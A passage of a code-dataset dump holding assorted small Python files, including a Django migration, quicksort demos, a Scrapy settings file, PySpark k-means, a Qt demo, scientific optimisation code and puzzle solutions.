y)\nplt.title(\"Throw trajectory\")\nplt.show()\n\n","sub_path":"rzut_poprawawzoru.py","file_name":"rzut_poprawawzoru.py","file_ext":"py","file_size_in_byte":4739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"625098194","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('Departamentos', '0008_auto_20150808_0104'),\n        ('Historicos', '0004_auto_20150804_0456'),\n    ]\n\n    operations = [\n        migrations.AddField(\n            model_name='registro',\n            name='fk_departamento',\n            field=models.ForeignKey(to='Departamentos.Departamento', null=True),\n        ),\n    ]\n","sub_path":"apps/Historicos/migrations/0005_registro_fk_departamento.py","file_name":"0005_registro_fk_departamento.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"9363693","text":"'''\nLomuto Partition.\n\nCondition for quick sort:\nTake a pivot element; all the elements to the left of the pivot are less than the pivot, and all the elements to the right of the pivot are greater than the pivot.\n\nThe core of quick sort is the partition.\n\n1. Make the last element the pivot and the partition index the start.\n2. Traverse the array, checking if the ith element is less than or equal to the pivot element.\n3. If the ith element is smaller, swap it with the element at the partition index. Increment the partition index.\n4. After all the swapping of the ith element and the partition index is done, swap the end element and the partition index.\n\n'''\n\n# Lomuto partition\n# def partition(array, start, end):\narray = [10,7,8,9,1,5]\nn = len(array)\nprint(\"Length\",n)\nstart = 0\nend = n-1\npivot = array[end]\nprint(\"Pivot\", pivot)\np_index = start\n\nfor i in range(n-1):\n\tprint(\"i:\",i)\n\tif array[i] <= pivot:\n\t\tprint(\"array[i]:\",array[i],\"pivot\", pivot)\n\t\tarray[i], array[p_index] = array[p_index], array[i]\n\t\tp_index += 1\n# swapping the pivot and the partition index\n\narray[end], array[p_index] = array[p_index], array[end]\nprint(array)\n\n'''\nHoare Partition:\n\nIn most cases the first element is the pivot element.\n\n1. Make the 2nd element the start 'i' and the last element 'j' the end.\n2. Compare the ith element with the pivot element; if the ith element is greater than the pivot element, pause i there.\n3. 
Now compare the pivot with the element at index j; if the jth element is less than the pivot, swap the i and j elements.\n4. Moving forward we increment i, and for j we decrement j.\n5. Once j has crossed i, swap the j element and the pivot element.\n\n'''\n# Hoare Partition\narray = [10, 7, 9, 8, 1, 5]\nn = len(array)\nprint(\"length:\", n)\nstart = 0\nend = n-1\npIndex = start\npivot = array[pIndex]\nwhile start < end:\n\twhile start < end and array[start] <= pivot:\n\t\tstart += 1\n\twhile array[end] > pivot:\n\t\tend -= 1\n\n\tif start < end:\n\t\tarray[start], array[end] = array[end], array[start]\n\narray[pIndex], array[end] = array[end], array[pIndex]\nprint(array)\n\nimport argparse, os, logging\nimport json\nfrom bs4 import BeautifulSoup\n\nlogging.basicConfig(filename='gent-simplify.log', level=logging.DEBUG)\n\ndef ckanparse(infile, outfile):\n\t\"\"\"Parse HTML file and store it in a new (simplified) JSON file.\"\"\"\n\tlogging.info('Parsing ' + str(infile))\n\n\tdata = {} \n\n\twith open(infile, 'r') as f:\n\t\tsoup = BeautifulSoup(f.read())\n\t\t\n\t\tdata['title'] = soup.find('h1', class_='title').get_text()\n\n\t\tbody = soup.find('div', class_='field-name-body')\n\t\tdata['body'] = body.find('p').get_text()\n\n\t\tfor k in ('contexts', 'urls', 'fmts', 'tags', 'license'):\n\t\t\tdata[k] = set()\t\n\n\t\tname = soup.find('link', rel='canonical')\n\t\tdata['contexts'].add('http://data.gent.be' + name['href'])\n\n\t\tnode = soup.find('div', class_='node-dataset')\n\n\t\tdiv = node.find('div', class_='field-name-field-basisinformatie')\n\t\tif div:\n\t\t\thref = div.find('a')\n\t\t\tif href:\n\t\t\t\tdata['contexts'].add(href['href'])\n\n\t\tdiv = node.find('fieldset', class_='group-download')\n\t\tif div:\n\t\t\threfs = div.find_all('a')\n\t\t\tfor href in hrefs:\n\t\t\t\tdata['urls'].add(href['href'])\n\t\t\t\tdata['fmts'].add(href.get_text())\n\n\t\tfor label in node.find_all('a', typeof='skos:Concept'):\n\t\t\tdata['tags'].add(label.get_text())\n\n\t# Add defaults for required fields\n\tdata['body'] = data['body'].strip()\n\n\tdata['org'] = ['--Gent']\n\tdata['geo'] = ['----Gent']\n\t\n\tdata['media'] = ['Download', 'Webservice']\n\n\tdata['license'].add('Zie website van de data leverancier')\n\n\t# make entries JSON serializable \n\tfor k in ('contexts', 'urls', 'tags', 'fmts', 'license'): \n\t\tdata[k] = list(data[k])\n\t\n\twith open(outfile, 'w') as f:\n\t\tjson.dump(data, f, indent=4)\n\n\ndef main():\t\n\tparser = argparse.ArgumentParser(description='Simplify Gent HTML files')\n\tparser.add_argument('--indir', help='Input directory', required=True)\n\tparser.add_argument('--outdir', help='Output directory', required=True)\n\t\n\targs = parser.parse_args()\n\t\n\tfor f in os.listdir(args.indir):\n\t\tckanparse(os.path.join(args.indir, f), os.path.join(args.outdir, f))\n\t\t\t\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"html/gent/gent-simplify.py","file_name":"gent-simplify.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"115583481","text":"from src.utils.swap import swap\n\n\ndef quick_sort(arr):\n    return qs(arr, 0, len(arr) - 1)\n\n\ndef qs(arr, start, end):\n    if (start < end):\n        partitionIdx = partition(arr, start, end)\n\n        qs(arr, start, partitionIdx - 1)\n        qs(arr, partitionIdx + 1, end)\n\n    return arr\n\n\ndef partition(arr, start, end):\n    pivot = arr[end]\n    partitionIdx = start\n\n    for i in range(start, end):\n        if arr[i] <= pivot:\n            swap(arr, i, partitionIdx)\n            partitionIdx += 1\n\n    swap(arr, partitionIdx, end)\n\n    return 
partitionIdx\n","sub_path":"src/sort/quick.py","file_name":"quick.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"313305289","text":"# -*- coding: utf-8 -*-\nfrom .user_agents import agents\n\nBOT_NAME = 'wuba'\n\nSPIDER_MODULES = ['wuba.spiders']\nNEWSPIDER_MODULE = 'wuba.spiders'\n\n\nROBOTSTXT_OBEY = False\n\nCOOKIES_ENABLED = False\n\n# USER_AGENT = agents\n\nDOWNLOAD_DELAY = 1 # 延迟\n\n# LOG_LEVEL = 'INFO' # 日志级别\n\nITEM_PIPELINES = {\n 'wuba.pipelines.WubaPipeline': 300,\n}\n# # 配置redis\n# SCHEDULER = \"scrapy_redis.scheduler.Scheduler\" #调度\n# DUPEFILTER_CLASS = \"scrapy_redis.dupefilter.RFPDupeFilter\" #去重\n# SCHEDULER_PERSIST = True #不清理Redis队列\n# SCHEDULER_QUEUE_CLASS = \"scrapy_redis.queue.SpiderQueue\" #队列\n\n#配置MongoDB\nMONGODB_HOST = '127.0.0.1'\nMONGODB_PORT = 27017\nMONGODB_DBNAME = \"wuba\"\nMONGODB_DOCNAME = \"zufang\"\n\n# # 配置redis\n# REDIS_HOST = '192.168.1.199'\n# REDIS_PORT = 6379\n","sub_path":"wuba/wuba/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"70318360","text":"from pytest import fixture\nimport json\n\n\n@fixture(scope=\"session\")\ndef feedback():\n with open(\"feedback.jsonc\", \"r\") as handle:\n fixed_json = \"\".join(\n line for line in handle if not line.strip().startswith(\"//\")\n )\n return json.loads(fixed_json)\n\n\ndef test_dar_uma_nota_de_0_a_10_ao_projeto(feedback):\n nota = feedback.get(\"nota\")\n assert type(nota) is int\n assert 0 <= nota <= 10\n\n\ndef test_falar_dos_pontos_positivos(feedback):\n comentario = feedback.get(\"pontos_positivos\")\n assert type(comentario) is not None\n assert comentario.strip() != \"\"\n\n\ndef test_falar_dos_pontos_negativos(feedback):\n comentario = feedback.get(\"pontos_negativos\")\n assert type(comentario) is not None\n assert comentario.strip() != \"\"\n","sub_path":"tests/test_feedback.py","file_name":"test_feedback.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"342909611","text":"import nnpu\nimport tvm\nimport topi\nfrom nnpu.utils import ScheduleProcHelper\nimport numpy as np\n\nimport argparse\n\nparser = argparse.ArgumentParser(description='test of NNPU Op')\nparser.add_argument('--sim', type=str, help='the simulator to use', \n default='S0', choices=['S0', 'S1', 'SC'])\nargs = parser.parse_args()\n\nenv = nnpu.get_env()\nnnpu.set_device(env, type=args.sim)\n\nwith ScheduleProcHelper():\n env = nnpu.get_env()\n shape = (48, 48)\n insn_shape = (16, 16)\n\n dtype_n, dtype_w = env.cfg['dtype_n'], env.cfg['dtype_w']\n a = tvm.placeholder(shape, dtype_n, 'a')\n b = tvm.placeholder(shape, dtype_n, 'b')\n \n sph = ScheduleProcHelper.current\n\n a_buf, a_dram = nnpu.utils.CopyHtoBuf(a, 'a', sph)\n b_buf, b_dram = nnpu.utils.CopyHtoBuf(b, 'b', sph)\n\n k = tvm.reduce_axis((0, shape[1]), 'k')\n dot_shape = (shape[0], )\n dot_buf = tvm.compute(dot_shape, \n lambda i: tvm.sum(a_buf[i, k].astype(dtype_w) * \n b_buf[i, k].astype(dtype_w), k), \n 'dot_buf')\n sph.MarkScope(dot_buf, 'acc')\n \n res_buf = nnpu.utils.CopyAccToBuf(dot_buf, 'res')\n \n res_host, _ = nnpu.utils.CopyBufToH(res_buf, 'res')\n\n # tensorize\n s = nnpu.create_schedule(res_host.op)\n xo, ro, xi, ri = s[dot_buf].tile(dot_buf.op.axis[0], dot_buf.op.reduce_axis[0],\n insn_shape[0], insn_shape[1])\n 
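    # A note on the two lines above/below (assuming TVM-style scheduling
    # semantics, which nnpu appears to build on): tile() splits the spatial
    # axis and the reduce axis each into an (outer, inner) pair, so the
    # innermost (xi, ri) nest covers exactly one 16x16 block -- the same
    # shape as insn_shape. tensorize() then replaces that inner nest with a
    # single MRowDot intrinsic that accumulates into the 'acc' scratchpad,
    # matching sph.MarkScope(dot_buf, 'acc') earlier in the file.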
s[dot_buf].tensorize(xi, env.intrins.get('MRowDot', shape=insn_shape, \n mode='inc', scope_out='acc'))\n\n print(nnpu.lower(s, [a, b, res_host], simple_mode=True))\n \n func = nnpu.build(s, [a, b, res_host], 'nnpu', 'llvm', name='nnpu_func')\n\n print('------------------- device module 1 asm code: ')\n print(func.imported_modules[0].get_source('asm'))\n \n ctx = tvm.nd.TVMContext(13, 0)\n\n a_np = np.random.randint(size=shape, dtype=a.dtype, low = -32, high = 32)\n #a_np = np.random.random(size=shape).astype(a_host.dtype)\n a_nd = tvm.nd.array(a_np, ctx)\n\n b_np = np.random.randint(size=shape, dtype=b.dtype, low = -32, high = 32) \n b_nd = tvm.nd.array(b_np, ctx)\n c_nd = tvm.nd.array(np.zeros((shape[0], )).astype(res_host.dtype), ctx)\n\n func(a_nd, b_nd, c_nd)\n #print('a = ')\n #print(a_np)\n #print('b = ')\n #print(b_np)\n\n print(c_nd.asnumpy())\n print('ground truth is')\n gt = np.multiply(a_np, b_np, dtype=res_host.dtype)\n gt = np.sum(gt, axis=1)\n print(gt)\n np.testing.assert_allclose(c_nd.asnumpy(), gt)\n print('test passed')","sub_path":"nnpu/tests/test_strided/test_strided_mat_row_dot.py","file_name":"test_strided_mat_row_dot.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"83732581","text":"from pyspark import SparkContext\nfrom pyspark.mllib.feature import HashingTF\nfrom pyspark.mllib.feature import IDF\nfrom pyspark.mllib.linalg import Vectors\nfrom pyspark.mllib.clustering import KMeans, KMeansModel\nfrom numpy import array\nfrom math import sqrt\n\ndef createKmeansVector(vector):\n\tparsedData = [0 for i in range(45000)]\n\tvectorSplit = vector.split(';')\n\tfor vs in vectorSplit:\n\t\tvSplit = vs.split(' ')\n\t\tparsedData[int(vSplit[0])] = float(vSplit[1])\n\treturn parsedData\n\nsc = SparkContext()\nparsedData = sc.textFile(\"hdfs://localhost:8020/pyspark/vector\")\\\n\t.map(lambda x: x.split(':'))\\\n\t.map(lambda x:createKmeansVector(x[1]))\n\t\nclusters = KMeans.train(parsedData, 10, maxIterations=10, runs=10, initializationMode=\"random\")\t\n\nclusters.save(sc, \"myModelPath\")\nsameModel = KMeansModel.load(sc, \"myModelPath\")\n\ndef error(point):\n center = sameModel.centers[sameModel.predict(point)]\n return sqrt(sum([x**2 for x in (point - center)]))\n\nWSSSE = parsedData\\\n\t.map(lambda point: error(point))\\\n\t.reduce(lambda x, y: x + y)\nprint(\"Within Set Sum of Squared Error = \" + str(WSSSE))\n\n#print(parsedData.collect()[1])","sub_path":"reishi_batch/pyspark/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"463006172","text":"#!/usr/bin/env python3\n\nimport sys\nimport os.path\n\ndef bankWithMostBlocks(banks):\n return sorted(list(banks.items()), key=lambda e: e[1], reverse=True)[0][0]\n\ndef main(data):\n dataLength = len(data)\n configurations = set()\n configuration = tuple(list(data.values()))\n\n while configuration not in configurations:\n configurations.add(configuration)\n bankIdx = bankWithMostBlocks(data)\n blocksToRedistribute = data[bankIdx]\n data[bankIdx] = 0\n while blocksToRedistribute > 0:\n bankIdx = (bankIdx + 1) % dataLength\n data[bankIdx] += 1\n blocksToRedistribute -= 1\n configuration = tuple(list(data.values()))\n\n counter = 0\n configTarget = configuration\n\n while True:\n if configuration == configTarget and counter > 0:\n break\n counter += 1\n bankIdx = bankWithMostBlocks(data)\n 
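        # This second loop replays the same redistribution, starting from the
        # first repeated configuration found above, and counts the steps until
        # that configuration recurs -- i.e. the cycle length asked for in part
        # two. Design aside: bankWithMostBlocks() sorts every bank just to
        # pick one; max(data.items(), key=lambda e: e[1])[0] makes the same
        # choice in O(n), and like the stable sort it keeps the first
        # (lowest-index) bank on ties.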
blocksToRedistribute = data[bankIdx]\n data[bankIdx] = 0\n while blocksToRedistribute > 0:\n bankIdx = (bankIdx + 1) % dataLength\n data[bankIdx] += 1\n blocksToRedistribute -= 1\n configuration = tuple(list(data.values()))\n\n return counter\n\nif __name__ == '__main__':\n testVectors = [\n ({0: 0, 1: 2, 2: 7, 3: 0}, 4),\n ]\n\n testResults = [ main(ti[0]) == ti[1] for ti in testVectors ]\n if all(testResults):\n print(\"All tests passed!\")\n inputFile = os.path.join(\n os.path.dirname(\n os.path.dirname(\n os.path.abspath(sys.argv[0])\n )\n ), 'input'\n )\n if os.path.isfile(inputFile):\n with open(inputFile, 'r') as fh:\n inputData = fh.read()\n inputData = inputData.strip()\n inputData = { i: int(e) for i, e in enumerate( inputData.split() ) }\n print(main(inputData))\n else:\n print(\"Input file not found\")\n else:\n print(testResults)\n print(main({0: 0, 1: 2, 2: 7, 3: 0}))\n","sub_path":"06/python/AoC_6b.py","file_name":"AoC_6b.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"15956630","text":"\"\"\"\nhttps://www.qt.io/qt-for-python\npyside2 is official interface\n\nsudo pacman -S pyside2\n\n\"\"\"\n\nfrom PySide2 import QtCore, QtWidgets, QtGui\nimport random\nimport sys\n\n\nclass MyWidget(QtWidgets.QWidget):\n def __init__(self):\n QtWidgets.QWidget.__init__(self)\n self.hello = ['a', 'b', 'c']\n self.button = QtWidgets.QPushButton('click me')\n self.text = QtWidgets.QLabel('hello world')\n self.text.setAlignment(QtCore.Qt.AlignCenter)\n self.layout = QtWidgets.QVBoxLayout()\n self.layout.addWidget(self.text)\n self.layout.addWidget(self.button)\n self.setLayout(self.layout)\n self.button.clicked.connect(self.magic)\n\n def magic(self):\n self.text.setText(random.choice(self.hello))\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n widget = MyWidget()\n widget.show()\n sys.exit(app.exec_())\n","sub_path":"default_qt.py","file_name":"default_qt.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"139175236","text":"import random\nimport time\n\n# check if target in muyList\ndef inList(myList, target): \n for i in myList: \n if (i == target): \n return True\n return False\n\n# print a multiplication between i and j \ndef printQuestion(i, j):\n print(\"What is\", i, \" x \", j, \" ?\") \n\n\n# print possible answers \ndef printOptions(myList): \n for i in range(len(myList)): \n print(chr((ord('a') + i)), myList[i])\n\n\ndef answerList(number, myList): \n result = []\n for i in myList: \n result.append(number * i)\n return result\n\n# return a list of possible answer \ndef createOption(i, j): \n result = []\n result.append(i*j)\n for duration in range(3):\n temp = random.randint(1,9)\n\n while(True):\n temp = random.randint(1,9)\n if inList(result, temp):\n continue\n break\n result.append(i * temp) \n return result \n\ndef checkAnswer(myAnswerIndex, myList, number, target):\n if myList[myAnswerIndex] == number * target:\n return True\n return False\n\n\n\n\nprint(\"Welcome to Multiplication Game\")\nprogress = [ [0 for i in range(9)] for j in range(9)] \nwhile(True):\n number = input(\"Which number do you want to learn? 
\")\n number = int(number)\n if number <0 or number > 9: \n print(\"Please input number from 1 to 9\")\n continue\n break \ntime.sleep(1)\n\nprint(\"Are you ready?\")\nfromZeroToNine = list(range(0,9))\nrandom.shuffle(fromZeroToNine)\nfor i in fromZeroToNine:\n options = createOption(number, i)\n random.shuffle(options)\n printQuestion(number, i)\n printOptions(options)\n your_answer= input(\"What is the correct answer? a, b, c ,d\")\n your_answer_index = ord(your_answer) - ord('a')\n #print (\"*****\",your_answer_index)\n if (checkAnswer(your_answer_index, options, number, i)):\n print(your_answer ,\"That's the correct answer \")\n else:\n print(your_answer, \"Sorry, This is not correct\")\n print(\"***************************\")\n print()\n\n\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"243762456","text":"\"\"\"\nMaximisation step: Fit a component to the data: Find parameters of the\ncomponent at birth time that fit the data today.\n\nThis requires the component propagation in time.\n\n\"\"\"\n\nimport numpy as np\nimport scipy.optimize\n\n#~ from chronostar import likelihood2\nfrom chronostar.component import SphereComponent\n\ntry:\n #TODO age consideration parameter from .pars file\n age_parameter=False\n if age_parameter:\n from chronostar.likelihood import lnprob_func_gradient_descent\n else:\n from chronostar._likelihood import lnprob_func_gradient_descent\n #TODO from NS, what is _likelihood compared to likelihood.py? \n # Will _likelihood go around the likelihood_w_ages, leaving the age \n # consideration out of the mximisation step?\nexcept ImportError:\n print(\"C IMPLEMENTATION OF lnprob_func_gradient_descent NOT IMPORTED\")\n USE_C_IMPLEMENTATION = False\n TODO = True # NOW WHAT?\n\ndef fit_single_comp_gradient_descent_serial(data, memb_probs=None, \n init_pars=None, Component=SphereComponent, \n convergence_tol=1, optimisation_method='Nelder-Mead'):\n \"\"\"\n Write docs...\n \"\"\"\n\n #~ print('init_pars', init_pars)\n\n init_age = init_pars[-1]\n age_offsets = [-9, -4, -0.4, -0.2, -0.5, 0., 0.1, 0.3, 0.5, 5., 10., 20., 40.]\n #~ age_offsets = [-9, -4, -0.4, -0.2, -0.5, 0., 0.1, 0.3, 0.5, 5., 10., 20., 40.]\n #~ age_offsets = [0., 10.] 
# for testing\n init_ages = np.abs([init_age + age_offset for age_offset in age_offsets])\n init_guess_comp = Component(emcee_pars=init_pars)\n # Age split hardcoded!\n init_guess_comps = init_guess_comp.split_group_ages(init_ages)\n init_pos = [c.get_emcee_pars() for c in init_guess_comps]\n \n\n # Prepare data: exclude non-members\n # This is the required C format\n a = []\n memb_threshold=1e-5\n nearby_star_mask = np.where(memb_probs > memb_threshold)\n for i in nearby_star_mask[0]:\n tmp = np.hstack((data['means'][i], data['covs'][i].flatten(), memb_probs[i]))\n a.append(tmp)\n a=np.array(a)\n\n return_dict={}\n for i in range(len(init_pos)):\n #~ print('init_pos[%d]'%i, init_pos)\n #~ print('optimisation_method', optimisation_method)\n result = scipy.optimize.minimize(lnprob_func_gradient_descent, \n init_pos[i], args=a, \n tol=convergence_tol, method=optimisation_method)\n return_dict[i] = result\n\n\n keys = list(return_dict.keys()) # Keep the keys so you always have the same order\n result_fun = [[k, return_dict[k].fun] for k in keys]\n result_fun_sorted = sorted(result_fun, key=lambda x: x[1])\n best_key = result_fun_sorted[0][0]\n best_result = return_dict[best_key]\n\n # Identify and create the best component (with best lnprob)\n best_component = Component(emcee_pars=best_result.x)\n \n return best_component, best_result.x, -best_result.fun # Check if really minus. Minus is already in the likelihood...\n\n\ndef maximisation_gradient_descent_serial(data, ncomps=None, \n memb_probs=None, all_init_pars=None, all_init_pos=None,\n convergence_tol=1, Component=SphereComponent,\n optimisation_method='Nelder-Mead', \n idir=None):\n \"\"\"\n What is idir?\n \"\"\"\n \n \"\"\"\n I get lots pf pickling errors.\n \n From stackoverflow:\n \n The multiprocessing module has a major limitation when it comes to IPython use:\n\n Functionality within this package requires that the __main__ module be importable by the children. [...] This means that some examples, such as the multiprocessing.pool.Pool examples will not work in the interactive interpreter. [from the documentation]\n\n Fortunately, there is a fork of the multiprocessing module called multiprocess which uses dill instead of pickle to serialization and overcomes this issue conveniently.\n\n Just install multiprocess and replace multiprocessing with multiprocess in your imports\n \"\"\"\n \n return_dict={}\n for i in range(ncomps):\n best_comp, final_pos, lnprob =\\\n fit_single_comp_gradient_descent_serial(data=data, \n memb_probs=memb_probs[:, i],\n convergence_tol=convergence_tol,\n #~ init_pos=all_init_pos[i],\n init_pars=all_init_pars[i], Component=Component,\n #~ trace_orbit_func=trace_orbit_func,\n optimisation_method=optimisation_method, # e.g. 
Nelder-Mead\n )\n return_dict[i] = [best_comp, lnprob, final_pos]\n\n\n\n new_comps_list = [return_dict[i][0] for i in range(ncomps)]\n all_lnprob = [return_dict[i][1] for i in range(ncomps)]\n all_final_pos = [return_dict[i][2] for i in range(ncomps)]\n\n return new_comps_list, all_lnprob, all_final_pos\n\n\ndef maximisation_gradient_descent_multiprocessing(data, ncomps=None, \n memb_probs=None, all_init_pars=None, all_init_pos=None,\n convergence_tol=1, Component=SphereComponent,\n optimisation_method='Nelder-Mead', \n idir=None):\n \"\"\"\n What is idir?\n \"\"\"\n \n \"\"\"\n I get lots pf pickling errors.\n \n From stackoverflow:\n \n The multiprocessing module has a major limitation when it comes to IPython use:\n\n Functionality within this package requires that the __main__ module be importable by the children. [...] This means that some examples, such as the multiprocessing.pool.Pool examples will not work in the interactive interpreter. [from the documentation]\n\n Fortunately, there is a fork of the multiprocessing module called multiprocess which uses dill instead of pickle to serialization and overcomes this issue conveniently.\n\n Just install multiprocess and replace multiprocessing with multiprocess in your imports\n \"\"\"\n print('IN maximisation_gradient_descent_multiprocessing')\n \n manager = multiprocessing.Manager()\n return_dict = manager.dict()\n \n #~ global worker # should solve pickle error in ipython, but it doesn't\n \n #~ return_dict={}\n #~ for i in range(ncomps):\n #~ best_comp, final_pos, lnprob =\\\n #~ fit_single_comp_gradient_descent_serial(data=data, \n #~ memb_probs=memb_probs[:, i],\n #~ convergence_tol=convergence_tol,\n #init_pos=all_init_pos[i],\n #~ init_pars=all_init_pars[i], Component=Component,\n #trace_orbit_func=trace_orbit_func,\n #~ optimisation_method=optimisation_method, # e.g. Nelder-Mead\n #~ )\n #~ return_dict[i] = [best_comp, lnprob, final_pos]\n\n\n\n\n def worker(i, return_dict):\n best_comp, final_pos, lnprob =\\\n fit_single_comp_gradient_descent_serial(data=data, \n memb_probs=memb_probs[:, i],\n convergence_tol=convergence_tol,\n init_pars=all_init_pars[i], Component=Component,\n optimisation_method=optimisation_method, # e.g. Nelder-Mead\n )\n\n return_dict[i] = [best_comp, lnprob, final_pos]\n\n\n\n\n jobs = []\n for i in range(ncomps):\n process = multiprocessing.Process(target=worker, \n args=(i, return_dict))\n jobs.append(process)\n\n # Start the processes\n for j in jobs:\n j.start()\n\n # Ensure all of the processes have finished\n for j in jobs:\n j.join()\n\n\n print('END maximisation_gradient_descent_multiprocessing')\n\n\n\n new_comps_list = [return_dict[i][0] for i in range(ncomps)]\n all_lnprob = [return_dict[i][1] for i in range(ncomps)]\n all_final_pos = [return_dict[i][2] for i in range(ncomps)]\n\n return new_comps_list, all_lnprob, all_final_pos\n","sub_path":"chronostar/maximisationC.py","file_name":"maximisationC.py","file_ext":"py","file_size_in_byte":7549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"420781356","text":"#!/usr/bin/env python\n\n#CodeWars 2014\n#\n#Goldbach's Conjecture\n\n# Goldbach's conjecture says that every positive even number greater than 2 is \n# the sum of two prime numbers. 
This conjecture has never been proven in the \n# general case, but it has been confirmed for numbers much larger than \n# your programming environment's native data type supports.\n#\n# Write a program to print the two prime numbers that sum to a given even integer.\n# Find the two primes with the smallest difference\n#\n# Input\n#\n# Each line of input will be a positive, even integer greater than two, \n# except the last line, which will be zero. The maximum input value will be 1000.\n#\n# 28\n# 992\n# 16\n# 0\n# \n\nimport sys\nfrom math import sqrt\n\ndef isprime(value):\n for divisor in range (2, int(sqrt(value))+1):\n if (value/divisor == int(value/divisor)):\n return 0\n return 1\n\nprint (\"Enter even numbers. 0 to end.\")\nfor line in sys.stdin:\n total = int(line)\n lowestDiff=total\n if (total == 0):\n break\n for low in range(3, int((total/2)+1)):\n if (isprime(low)==1):\n high = total-low\n if (isprime(high)==1):\n # Found an answer. Update if lowest answer is found.\n if (high-low < lowestDiff):\n lowestDiff = high-low\n bestLow = low\n bestHigh = high\n print (bestLow, \"+\", bestHigh, \"=\", total)\n\n","sub_path":"codewars/2014/SampleSolutions2014/prob09_Goldbach.py","file_name":"prob09_Goldbach.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"246839822","text":"import visualization\nimport xyPlot\nimport displayGroupOdbToolset as dgo\nimport os, glob, inspect\nimport sys\nsys.path.append('C:\\\\Users\\\\doktor\\\\PycharmProjects\\\\InputFilesBuild - Copy')\nimport globalPar as gp\nreload(gp)\n\npath = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) +'\\\\workingDirectory\\\\'\nos.chdir(path)\n\ngp.scandirs(path)\n\n#odbKeysList = ['SDV11', 'SDV_EE11', 'SDV_EE12', 'SDV_EE13', 'SDV_EE22', 'SDV_EE23', 'SDV_EE33', 'SDV_EP11', 'SDV_EP12',\n# 'SDV_EP13', 'SDV_EP22', 'SDV_EP33', 'SDV_PEEQ', 'SDV_TEP']\n\n\npc = gp.ParametersClass()\nsemicolon =';'\ncomma = ','\n\n# Header\ndispFile_to_view = open('db_to_view_FFT.csv', 'a')\nfile = glob.glob(\"*.odb\")[0]\no1 = session.openOdb(name=path + file)\nodb = session.odbs[path + file]\nstep = odb.steps['Step-1']\n\nodbLabels = gp.get_labels(step)\n\n#Header - only on file initialization\ndispFile_to_view.write('id' + semicolon + 'delta' + semicolon + 'alpha' + semicolon + 'velocity' + semicolon + 'time'\n + semicolon + 's' + semicolon + 'Tm' + semicolon + 'm')\n#Header - only on file initialization\n\nfor key in odbLabels.keys():\n if not odbLabels[key]['labels']:\n dispFile_to_view.write(semicolon + str(key))\n #dispFile.write(comma + str(key))\n else:\n for label in odbLabels[key]['labels']:\n dispFile_to_view.write(semicolon + str(label))\n #dispFile.write(comma + str(label))\nodb.close()\n\n\nfor file in glob.glob(\"*.odb\"):\n print(file)\n o1 = session.openOdb(name=path + file)\n odb = session.odbs[path + file]\n step = odb.steps['Step-1']\n\n #odbLabels = gp.get_labels(step)\n\n # Data rows\n alpha, Dxx = gp.get_additional_parameters(file)\n print(alpha)\n time = pc.s / pc.velocity ##velocity in mm/s\n\n for id, frame in enumerate(step.frames):\n dispFile_to_view.write('\\n' + str(id) + semicolon + str(Dxx) + semicolon + str(alpha) + semicolon +\n str(pc.velocity) + semicolon + str(time) + semicolon + str(pc.s) + semicolon + str(pc.Tm) + semicolon + str(pc.m))\n\n for key in odbLabels.keys():\n if not odbLabels[key]['labels']:\n dispFile_to_view.write(semicolon + 
str(frame.fieldOutputs[key].values[0].data))\n\n else:\n for label in odbLabels[key]['labels']:\n if key == 'S':\n dispFile_to_view.write(semicolon + str(frame.fieldOutputs[key].getScalarField(componentLabel=label).values[0].data))\n else:\n dispFile_to_view.write(semicolon + str(frame.fieldOutputs[key].getScalarField(componentLabel=label).values[7].data))\n odb.close()\n\ndispFile_to_view.close()","sub_path":"OLD_code/OLD_3_1_abaqus_OdbReader.py","file_name":"OLD_3_1_abaqus_OdbReader.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"616397321","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 2 00:36:13 2015\n\n@author: Евгений\n\"\"\"\n\ndef push_annual(cursor, var_name, year, val):\n cursor.execute(\"INSERT OR REPLACE INTO annual VALUES (?, ?, ?)\", (var_name, year, val))\n\ndef push_quarter(cursor, var_name, year, quarter, val):\n cursor.execute(\"INSERT OR REPLACE INTO quarter VALUES (?, ?, ?, ?)\", (var_name, year, quarter, val))\n\ndef push_monthly(cursor, var_name, year, month, val):\n cursor.execute(\"INSERT OR REPLACE INTO monthly VALUES (?, ?, ?, ?)\", (var_name, year, month, val))\n\n\nimport sqlite3\nconn = 